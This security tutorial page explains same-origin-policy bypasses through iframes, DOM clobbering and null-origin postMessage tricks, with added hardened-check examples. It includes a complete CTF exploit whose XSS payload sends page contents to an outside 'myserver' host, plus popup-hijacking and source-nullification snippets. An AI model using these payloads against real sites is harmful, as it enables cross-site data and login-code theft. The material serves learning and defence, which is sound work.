Bypassing SOP with Iframes - 2

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Iframes in SOP-2

In the solution to the challenge, @Strellic_ proposes a technique similar to the one in the previous section. Let's look at it.

In this challenge the attacker needs to bypass this check:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

If he does, he can send a postMessage with HTML content that will be written into the page via innerHTML without sanitization (XSS).

The way to bypass the first check is to make window.calc.contentWindow undefined and e.source null:

  • window.calc.contentWindow is actually document.getElementById("calc"). You can clobber document.getElementById with <img name=getElementById /> (note that the Sanitizer API -here- is not configured to protect against DOM clobbering attacks in its default state).
  • Therefore, you can clobber document.getElementById("calc") with <img name=getElementById /><div id=calc></div>. Then, window.calc will be undefined.
  • Now we need e.source to be undefined or null (because == is used instead of ===, null == undefined is True). Getting this is easy. If you create an iframe, send a postMessage from it and immediately remove the iframe, e.origin is going to be null. Check the following code:
let iframe = document.createElement("iframe")
document.body.appendChild(iframe)
window.target = window.open("http://localhost:8080/")
await new Promise((r) => setTimeout(r, 2000)) // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`)
document.body.removeChild(iframe) //e.origin === null

To bypass the second check about the token, send a token with the value null and make window.token undefined:

  • Sending a token in the postMessage with the value null is trivial.
  • window.token is set by calling the function getCookie, which uses document.cookie. Note that any access to document.cookie in a page with a null origin triggers an error. This makes window.token end up with the value undefined.
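To make the receiver-side failure concrete, here is an added example (not code from the challenge or from @Strellic_) that places the vulnerable check next to a hardened one and drives both with simulated MessageEvent objects, so it runs in Node without a browser. The `pageState` object, the stand-in `calcWindow` WindowProxy, the `expectedOrigin` value and the sample token are all constructed for the example.

```javascript
// Added example (not from the original write-up): the vulnerable receiver-side
// check from the challenge next to a hardened version, driven by simulated
// MessageEvent objects so it runs in Node without a DOM.

// Vulnerable check, as the challenge page had it. `pageState` stands in for the
// receiver's window: `calcWindow` is window.calc.contentWindow (undefined after
// DOM clobbering) and `token` is window.token (undefined once getCookie threw).
function vulnerableCheck(event, pageState) {
  // Loose equality: null == undefined is true, so a null source and a null
  // token pass as soon as the page's own references have collapsed to undefined.
  return event.source == pageState.calcWindow && event.data.token == pageState.token;
}

// Hardened check: strict equality, explicit presence requirements and an origin
// pin. A null source, a null token, a "null" origin, or a page whose own
// references were clobbered away is rejected instead of silently matching.
function hardenedCheck(event, pageState) {
  if (typeof pageState.token !== 'string' || pageState.token.length === 0) return false;
  if (pageState.calcWindow === undefined || pageState.calcWindow === null) return false;
  if (event.source === null || event.source === undefined) return false;
  if (event.source !== pageState.calcWindow) return false;
  if (event.origin !== pageState.expectedOrigin) return false; // "null" never equals a real origin
  if (!event.data || typeof event.data.token !== 'string') return false;
  return event.data.token === pageState.token;
}

// Constructed events mimicking what the receiver's onmessage handler sees.
const calcWindow = { id: 'legit-calc-iframe-window' }; // constructed stand-in for a WindowProxy
const forgedEvent = {
  source: null,             // sending frame was removed right after postMessage
  origin: 'null',           // a sandboxed or removed frame reports the string "null"
  data: { token: null, result: '<b>injected markup</b>' }
};
const legitEvent = {
  source: calcWindow,
  origin: 'https://calc.example',   // constructed expected origin
  data: { token: 'abc123', result: '42' }
};

// Runs both checks against a clobbered page and a healthy page and returns the
// outcomes so they can be inspected or asserted on.
function runScenarios() {
  const clobberedPage = { calcWindow: undefined, token: undefined, expectedOrigin: 'https://calc.example' };
  const healthyPage = { calcWindow: calcWindow, token: 'abc123', expectedOrigin: 'https://calc.example' };
  return {
    vulnerableAcceptsForged: vulnerableCheck(forgedEvent, clobberedPage),
    hardenedAcceptsForged: hardenedCheck(forgedEvent, clobberedPage),
    vulnerableAcceptsLegit: vulnerableCheck(legitEvent, healthyPage),
    hardenedAcceptsLegit: hardenedCheck(legitEvent, healthyPage)
  };
}

console.log(runScenarios());
```

The hardened version also refuses to run when window.token or the frame reference is missing, which is the state DOM clobbering and the document.cookie error leave the page in; a receiver that captures `calcFrame.contentWindow` once at initialization rather than resolving it through document.getElementById on every message closes the clobbering path at its root.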

The final solution by @terjanq is the following:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open(
  'https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"'
)

function start() {
  var ifr = document.createElement("iframe")
  // Create a sandboxed iframe, as sandboxed iframes will have origin null
  // with this null origin, accessing document.cookie throws an error and window.token will be undefined
  ifr.sandbox = "allow-scripts allow-popups"
  ifr.srcdoc = `<script>(${hack})()<\/script>`

  document.body.appendChild(ifr)

  function hack() {
    var win = open("https://obligatory-calc.ctf.sekai.team")
    setTimeout(() => {
      parent.postMessage("remove", "*")
      // this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
      // token=null equals to undefined and e.source will be null so null == undefined
      win.postMessage(
        {
          token: null,
          result:
            "<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>",
        },
        "*"
      )
    }, 1000)
  }

  // this removes the iframe so e.source becomes null in the postMessage event.
  onmessage = (e) => {
    if (e.data == "remove") document.body.innerHTML = ""
  }
}
setTimeout(start, 1000)
</script>
</body>
</html>

2025 Null-Origin Popups (TryHackMe - Vulnerable Codes)

A recent TryHackMe room ("Vulnerable Codes") shows how OAuth popups can be hijacked when the opener lives inside a sandboxed iframe that only allows scripts and popups. The iframe forces both itself and every popup it opens to have the origin "null", so handlers that check if (origin !== window.origin) return fail silently, because window.origin inside the popup is also "null". Although the browser still shows the real location.origin, the victim never checks it, so the attacker-controlled message passes unnoticed.

const frame = document.createElement('iframe');
frame.sandbox = 'allow-scripts allow-popups';
frame.srcdoc = `
  <script>
    const pop = open('https://oauth.example/callback');
    pop.postMessage({ cmd: 'getLoginCode' }, '*');
  <\/script>`;
document.body.appendChild(frame);

Takeaways for abusing that setup:

  • Handlers that compare origin with window.origin inside the popup can be bypassed because both evaluate to "null", so the message appears legitimate.
  • Sandboxed iframes that grant allow-popups but omit allow-same-origin still spawn popups bound to an attacker-controlled null origin, giving you a stable foothold even in 2025 Chromium builds.
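Two defensive checks for this setup, as an added example that is not part of the TryHackMe room or the original page: `auditSandbox` is a hypothetical review helper that flags a sandbox attribute value whose popups will carry the opaque "null" origin (the token semantics are the standard ones: popups inherit the sandbox flags unless allow-popups-to-escape-sandbox is present), and `acceptPopupMessage` replaces the origin !== window.origin comparison with a fixed allowlist, so "null" can never match. The allowlist entries and the sample events are constructed for the example.

```javascript
// Added example (not from TryHackMe or the original page): defensive checks for
// the null-origin popup pattern. Runs in Node; events are constructed objects.

// Hypothetical review helper: returns findings for a sandbox attribute value.
function auditSandbox(sandboxValue) {
  const tokens = new Set(String(sandboxValue).trim().split(/\s+/).filter(Boolean));
  const findings = [];
  if (!tokens.has('allow-same-origin')) {
    findings.push('frame runs with an opaque (null) origin');
    if (tokens.has('allow-popups') && !tokens.has('allow-popups-to-escape-sandbox')) {
      findings.push('popups opened from this frame inherit the null origin');
    }
  }
  if (tokens.has('allow-scripts') && tokens.has('allow-same-origin')) {
    findings.push('allow-scripts + allow-same-origin lets the frame strip its own sandbox attribute');
  }
  return findings;
}

// Vulnerable pattern from the write-up: inside a null-origin popup window.origin
// is "null" as well, so a message with origin "null" satisfies the comparison.
function vulnerableOriginCheck(event, windowOrigin) {
  return event.origin === windowOrigin;
}

// Hardened pattern: compare against a fixed allowlist of expected origins.
// "null" is never allowlisted, so messages from sandboxed or removed frames are
// dropped regardless of what window.origin evaluates to in the receiver.
function acceptPopupMessage(event, allowedOrigins) {
  if (typeof event.origin !== 'string' || event.origin === 'null') return false;
  if (!allowedOrigins.includes(event.origin)) return false;
  return Boolean(event.data) && typeof event.data.cmd === 'string';
}

// Constructed events: one from a sandboxed opener, one from the real application.
const fromSandboxedOpener = { origin: 'null', source: {}, data: { cmd: 'getLoginCode' } };
const fromRealApp = { origin: 'https://app.example', source: {}, data: { cmd: 'getLoginCode' } };
const ALLOWED_ORIGINS = ['https://app.example']; // constructed allowlist

// Exercises both handlers and the markup audit; returns results for inspection.
function runPopupScenarios() {
  return {
    // The popup's own window.origin is "null", mirroring the TryHackMe setup.
    vulnerablePassesNull: vulnerableOriginCheck(fromSandboxedOpener, 'null'),
    hardenedRejectsNull: acceptPopupMessage(fromSandboxedOpener, ALLOWED_ORIGINS),
    hardenedAcceptsReal: acceptPopupMessage(fromRealApp, ALLOWED_ORIGINS),
    sandboxFindings: auditSandbox('allow-scripts allow-popups')
  };
}

console.log(runPopupScenarios());
```

Pinning the allowlist to literal origins also removes the dependence on location.origin, which the write-up notes the victim page never verifies; the audit helper is the kind of check to run over templates that embed third-party content in sandboxed frames.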

Source-nullification & frame-restriction bypasses

Industry write-ups around CVE-2024-49038 highlight two reusable primitives for this page: (1) you can still interact with pages that set X-Frame-Options: DENY by launching them through window.open and sending messages once navigation settles, and (2) you can brute-force event.source == victimFrame checks by removing the iframe right after sending the message, so the receiver only sees null in its handler.

// `payload` is the message body, defined elsewhere by the caller
const probe = document.createElement('iframe');
probe.sandbox = 'allow-scripts';
probe.onload = () => {
  const victim = open('https://target-app/');
  setTimeout(() => {
    probe.contentWindow.postMessage(payload, '*');
    probe.remove();
  }, 500);
};
document.body.appendChild(probe);

Combine this with the DOM-clobbering technique above: once the receiver only sees event.source === null, every comparison against window.calc.contentWindow or a similar object collapses, letting you deliver malicious HTML to innerHTML sinks again.
